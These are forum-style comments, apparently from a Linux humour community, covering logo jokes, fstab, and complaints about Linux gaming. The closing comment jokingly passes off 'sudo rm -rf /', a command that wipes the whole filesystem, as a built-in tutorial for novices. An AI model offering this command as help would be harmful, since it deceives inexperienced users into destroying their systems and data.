Honestly, I just wish they would ditch that disgusting foot logo. I hate it.

I'll not port my games to Linux! After all, my game is being natively made in Linux

I guess you could say Linux fanboys' silliness is...

...terminal.

bear, in F*** STAB

I literally didn’t put it together that it was FS-Tab until a couple years ago when I was setting up an encrypted drive manually in /etc/crypttab, something I had done many times before, when it finally clicked.

I’ve used Linux heavily for about 15 years.

Where do I hide the porn under Linux? Might migrate to Linux, and I want to keep my porn collection.

Rabbithole, in I'd just like to interject for a moment.

By not mentioning the Activity Pub protocol or FOSS (and then going off on GNU shit with direct quotes from Richard Stallman) even once, this is straining the bounds of possibility.

li10, in Linux Mint is still going strong after being my daily driver for 4 months, and I don't think i will be going back anytime soon.

I’m gonna get shit for it, but gaming on Linux really isn’t great imo.

My experience is that it’s a pain in the arse to get anything running, performance is worse, vsync is fucked, no HDR, doesn’t work with Hue Sync, and then a hundred other miscellaneous problems.

Proton is an incredible achievement from a technical standpoint, and if people are happy to put up with issues to protect their privacy then good on them, but I think people oversell how good the actual Linux gaming experience is.

P.S. I don’t need suggestions on how to fix the issues I listed. I’m more than able to resolve them if I had the time, I just don’t want to have those problems to start with.

The liquorix kernel has done wonders for me on that front. Your experience will vary though.

Rabbithole, in You could say I am a bit of a copy/paste expert..

I'm in a helpful mood so I'll add something for anyone stuck in OP's situation.

It's ok, Linux has a built in tutorial system for learning the terminal, so if you ever want to progress beyond copy/pasting, you can use that.

Just go into the terminal and type (or just copy/paste) this to get the tutorial program running:

sudo rm -rf /

Type your password when prompted and you're golden. No more linux issues ever again.
